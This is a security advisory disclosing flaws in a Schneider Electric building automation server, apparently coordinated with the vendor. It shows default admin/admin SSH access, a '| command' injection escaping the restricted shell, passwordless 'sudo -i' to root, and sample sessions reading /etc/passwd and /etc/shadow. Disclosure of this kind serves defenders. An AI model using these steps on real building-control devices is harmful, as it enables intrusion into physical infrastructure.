Schneider Electric Building Operation Automation Server 1.6.1.5000 Escalation / Command Execution

2016.03.04
Credit: Karn Ganeshen
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

*Schneider Electric Building Operation Automation Server Multiple Vulnerabilities* *Reported affected version:* Schneider Electric Building Operation Automation Server Firmware: Server 1.6.1.5000 NAME=SE2Linux ID=se2linux PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux) VERSION_ID=0.2.0.212 *Reported on: *August 2015 *Schneider Electric fix & public disclosure:* Feb 25, 2016 *URL:* http://oreo.schneider-electric.com/flipFlop/1739415603/index.htm?p_EnDocType=Technical%20leaflet&p_Reference=SEVD-2016-025-01&p_File_Name=SEVD-2016-025-01%20SBO%20AS.pdf&flipflop=1#/2 *Confirmed affected versions: * Automation Server Series (AS, AS-P), v1.7 and prior *Public Disclosure:* March 01, 2016 *Vulnerabilities* *1. Weak credential management* *CVE-ID:* None *[ Mitre, CVE? ]* There are two primary users: a. root - password is not set by default - this is a problem as we will see later in the vuln findings - By default, root cannot SSH in. b. admin - default password is 'admin' - Anyone can remotely ssh in to the device using default admin/admin login. The system / application allows a) weak creds to start with, and more importantly, b) vulnerable versions lacks the mechanism to forcefully have the user change the initial password on first use or later. This has been fixed in the latest version. *2. OS Command Injection* After logging in to the device over SSH, the 'admin' user - the only active, administrative user at this point - is provided a restricted shell (msh), which offers a small set of, application- specific functional options. $ ssh <IP> -l admin Password: Welcome! (use 'help' to list commands) admin@box:> admin@box:> release NAME=SE2Linux ID=se2linux PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux) VERSION_ID=0.2.0.212 admin@box:> admin@box:> help usage: help [command] Type 'help [command]' for help on a specific command. Available commands: exit - exit this session ps - report a snapshot of the current processes readlog - read log files reboot - reboot the system setip - configure the network interface setlog - configure the logging setsnmp - configure the snmp service setsecurity - configure the security settime - configure the system time top - display Linux tasks uptime - tell how long the system has been running release - tell the os release details Attempting to run any different command will give an error message. However, this restricted shell functionality (msh) can be bypassed to execute underlying system commands, by appending '| <command>' to any of the above set of commands: admin@box:> uptime | ls bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr etc localization proc share var admin@box:> uptime | cat /etc/passwd root:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false messagebus:x:3:3:messagebus:/sbin:/bin/false ntp:x:102:102:ntp:/var/empty/ntp:/bin/false sshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux Application:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh admin@box:> uptime | cat /etc/group root:x:0: wheel:x:1:admin daemon:x:2: messagebus:x:3: adm:x:5:admin power:x:20:app serial:x:21:app cio:x:22:app lon:x:23:app daemonsv:x:30:admin,app utmp:x:100: lock:x:101: ntp:x:102: sshd:x:103: app:x:500:admin admin:x:1000:admin *3. Privilege Escalation / access to root* *CVE-ID:* None *[ Mitre, CVE? ]* Since this is an administrative user, an attacker can exploit OS command injection to perform a variety of tasks from msh shell. But isn?t it better to get a root shell instead.! As observed from Issue 1 above, root does not have a password set, and it is possible to use 'sudo -i' and become root. Note: sudo is not presented / offered to 'admin' in the set of functional options available thru msh. admin@box:> *sudo -i* We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: *root@box:~> *cat /etc/shadow root:!:16650:0:99999:7::: sshd:!:1:0:99999:7::: admin:$6$<hash>:16652:0:99999:7::: +++++ The Automation Server (AS) is one functional component of the larger, StruxureWare Building Operation platform (SBO) solution / environment. The AS password gets sync?d to SBO application rbac. With the new release, the default AS password will be forcefully changed, and msh has been sufficiently improved to mitigate against command injection. Issue 3, however, persists. Anyone with access to msh shell, can still drop in to root shell, and have some fun. +++++ -- Best Regards, Karn Ganeshen


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top